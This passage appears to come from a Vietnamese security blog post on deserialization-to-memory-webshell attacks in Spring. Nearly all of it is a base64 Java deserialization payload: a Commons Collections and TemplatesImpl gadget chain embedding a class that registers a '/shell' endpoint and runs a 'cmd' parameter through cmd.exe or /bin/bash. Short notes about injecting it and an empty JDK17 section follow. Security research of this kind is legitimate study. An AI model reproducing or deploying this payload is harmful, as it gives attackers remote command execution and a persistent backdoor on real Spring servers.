AAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+khtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAFIXK/rq+AAAANADxCgA5AHkKAHoAewcAfAoAAwB9CgB+AH8HAIALAIEAggcAgwgAXwcAhAoACgCFCgARAIYIAFUHAIcKAAoAiAoADgCJBwCKCgAOAIsHAIwKAAgAeQoABgCNBwCOCgB6AI8KAAMAkAgAkQsAkgCTCwCSAJQIAJUKACYAlggAlwsAmACZCACaCgCbAJwKACYAnQgAngoAJgCfBwCgBwChCACiCACjCgAlAKQIAKUIAKYHAKcKACUAqAoAqQCqCgAsAKsIAKwKACwArQoALACuCgAsAK8KACwAsAoAsQCyCgCxALMKALEAsAsAmAC0BwC1AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAClMb3JnL2V4YW1wbGUvRXhwbG9pdERlc2VyMk1lbUhpZ2hWZXJzaW9uOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwC2AQAQTWV0aG9kUGFyYW1ldGVycwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAGPGluaXQ+AQADKClWAQAHY29udGV4dAEAN0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dDsBAA5tYXBwaW5nSGFuZGxlcgEAVExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQATZ2V0TWFwcGluZ0Zvck1ldGhvZAEABW1JbmZvAQA/TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm87AQADb2JqAQANU3RhY2tNYXBUYWJsZQcAgwcAjgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAAWEBABJMamF2YS9sYW5nL1N0cmluZzsBAANydW4BAAFwAQAaTGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcjsBAAFvAQABdwEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAAWMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEABGFyZzAHALcHALgHAKEHALkHAKAHAKcHALoBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA4TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZzsBAAV2YWx1ZQEABi9zaGVsbAEAClNvdXJjZUZpbGUBACBFeHBsb2l0RGVzZXIyTWVtSGlnaFZlcnNpb24uamF2YQwATQBOBwC7DAC8AL0BAEBvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvU2VydmxldFJlcXVlc3RBdHRyaWJ1dGVzDAC+AL8HAMAMAMEAwgEAUm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcHAMMMAMQAxQEAJ29yZy9leGFtcGxlL0V4cGxvaXREZXNlcjJNZW1IaWdoVmVyc2lvbgEAD2phdmEvbGFuZy9DbGFzcwwAxgDHDADIAMkBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QMAMoAxwwAywDMAQAQamF2YS9sYW5nL09iamVjdAwAzQDOAQA9b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbwwAzwDQAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwA0QC9DADSANMBAANjbWQHALcMANQA1QwAxgDWAQAEUE9TVAwA1wDYAQAABwC4DADZANoBAAdvcy5uYW1lBwDbDADcANUMAN0A1gEAA3dpbgwA3gDfAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAB2NtZC5leGUBAAIvYwwATQDgAQAJL2Jpbi9iYXNoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwA4QDiBwDjDADkAOUMAE0A5gEAAlxBDADnAOgMAOkA6gwA6wDWDADsAE4HALkMAO0AXAwA7gBODADvAPABAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQATamF2YS9pby9QcmludFdyaXRlcgEAE2phdmEvaW8vSU9FeGNlcHRpb24BADxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdENvbnRleHRIb2xkZXIBABRnZXRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBAApnZXRSZXF1ZXN0AQApKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBADtvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L3N1cHBvcnQvUmVxdWVzdENvbnRleHRVdGlscwEAGWZpbmRXZWJBcHBsaWNhdGlvbkNvbnRleHQBAGAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7KUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dDsBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAB2dldEJlYW4BACUoTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEWdldERlY2xhcmVkTWV0aG9kAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA9yZWdpc3Rlck1hcHBpbmcBAEEoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDspVgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAC2dldFJlc3BvbnNlAQAqKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAFY2xvc2UBAAV3cml0ZQEABWZsdXNoAQAJc2VuZEVycm9yAQAEKEkpVgAhAAgAOQAAAAAABQABADoAOwADADwAAAA/AAAAAwAAAAGxAAAAAgA9AAAABgABAAAAGAA+AAAAIAADAAAAAQA/AEAAAAAAAAEAQQBCAAEAAAABAEMARAACAEUAAAAEAAEARgBHAAAACQIAQQAAAEMAAAABADoASAADADwAAABJAAAABAAAAAGxAAAAAgA9AAAABgABAAAAGwA+AAAAKgAEAAAAAQA/AEAAAAAAAAEAQQBCAAEAAAABAEkASgACAAAAAQBLAEwAAwBFAAAABAABAEYARwAAAA0DAEEAAABJAAAASwAAAAEATQBOAAIAPAAAASMABgAHAAAAdyq3AAG4AALAAAO2AAS4AAVMKxIGuQAHAgDAAAZNEggSCQO9AAq2AAtOLLYADBINBb0AClkDEg5TWQQSClO2AA86BBkEBLYAEBkELAW9ABFZAy1TWQQSCFO2ABLAABM6BbsACFm3ABQ6BiwZBRkGLbYAFacABEyxAAEABAByAHUAFgADAD0AAAAuAAsAAAAdAAQAHwARACAAHQAhACkAIgBCACMASAAlAGAAJgBpACcAcgAoAHYAKQA+AAAASAAHABEAYQBPAFAAAQAdAFUAUQBSAAIAKQBJAFMAVAADAEIAMABVAFQABABgABIAVgBXAAUAaQAJAFgAQAAGAAAAdwA/AEAAAABZAAAAEAAC/wB1AAEHAFoAAQcAWwAARQAAAAQAAQAWAAEATQBcAAIAPAAAADkAAQACAAAABSq3AAGxAAAAAgA9AAAABgABAAAAKwA+AAAAFgACAAAABQA/AEAAAAAAAAUAXQBeAAEARwAAAAUBAF0AAAABAF8ATgADADwAAAICAAYACAAAANW4ABfAAAO2AARMuAAXwAADtgAYTSsSGbkAGgIATi3GAKkruQAbAQASHLYAHZkAmxIeOgUsuQAfAQA6BhIguAAhtgAiEiO2ACSZACG7ACVZBr0AJlkDEidTWQQSKFNZBS1TtwApOgSnAB67ACVZBr0AJlkDEipTWQQSK1NZBS1TtwApOgS7ACxZGQS2AC22AC63AC8SMLYAMToHGQe2ADKZAAsZB7YAM6cABRkFOgUZB7YANBkGGQW2ADUZBrYANhkGtgA3pwAMLBEBlLkAOAIApwAETLEAAQAAANAA0wAWAAMAPQAAAE4AEwAAADAACgAxABQAMwAdADQALwA2ADMANwA7ADgASwA5AGkAOwCEAD0AmgA+AK4APwCzAEAAugBBAL8AQgDEAEMAxwBEANAARgDUAEcAPgAAAFwACQBmAAMAYABhAAQAhABAAGAAYQAEADMAkQBiAF4ABQA7AIkAYwBkAAYAmgAqAGUAZgAHAAoAxgBnAGgAAQAUALwAaQBqAAIAHQCzAGsAXgADAAAA1QA/AEAAAABZAAAAXQAI/wBpAAcHAFoHAGwHAG0HAG4ABwBuBwBvAAD/ABoABwcAWgcAbAcAbQcAbgcAcAcAbgcAbwAA/AAlBwBxQQcAbv8AGgAEBwBaBwBsBwBtBwBuAAD4AAhCBwBbAABFAAAABAABAHIAcwAAAA4AAQB0AAEAdVsAAXMAdgABAHcAAAACAHhwdAAFYWhpaGlwdwEAeHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyAB1qYXZheC54bWwudHJhbnNmb3JtLlRlbXBsYXRlcwAAAAAAAAAAAAAAeHBzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4dnIAEmphdmEubGFuZy5PdmVycmlkZQAAAAAAAAAAAAAAeHBxAH4ALQ==

Tiến hành inject

Kết quả

3. Deser2memshell trong Spring với JDK17

Do bản JDK cao đã strict việc deser nên mình tạm để trống phần này 🙌

4. Refer

🕸️
LogoQuick Note Spring Memshell